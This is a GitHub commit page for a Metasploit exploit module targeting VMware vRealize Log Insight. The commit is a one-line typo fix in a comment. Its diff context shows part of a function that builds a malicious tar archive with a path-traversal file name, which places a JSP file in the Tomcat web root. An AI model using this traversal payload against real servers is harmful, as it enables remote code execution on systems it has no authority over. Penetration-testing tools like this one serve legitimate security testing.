Skip to content

Commit

Permalink
Update modules/exploits/linux/http/vmware_vrli_rce.rb
Browse files Browse the repository at this point in the history
Co-authored-by: jheysel-r7 <[email protected]>
  • Loading branch information
EgeBalci and jheysel-r7 authored Aug 18, 2023
1 parent 340e4c0 commit 86c8f11
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion modules/exploits/linux/http/vmware_vrli_rce.rb
Original file line number Diff line number Diff line change
Expand Up @@ -138,7 +138,7 @@ def generate_malicious_tar
jsp_name = 'api-v5-documentation.jsp' # version number can be randomized
slip_name = "../../usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/#{jsp_name}"
rand_data = Rex::Text.rand_text_alpha(35000..36000) # For realistic packet size
dummy_files = ['upgrade-image-8.10.2-21145187.rpm', 'upgrade-driver', 'eula.txt'] # Dummy but also nessesary
dummy_files = ['upgrade-image-8.10.2-21145187.rpm', 'upgrade-driver', 'eula.txt'] # Dummy but also necessary

tar = StringIO.new
Rex::Tar::Writer.new(tar) do |t|
Expand Down

0 comments on commit 86c8f11

Please sign in to comment.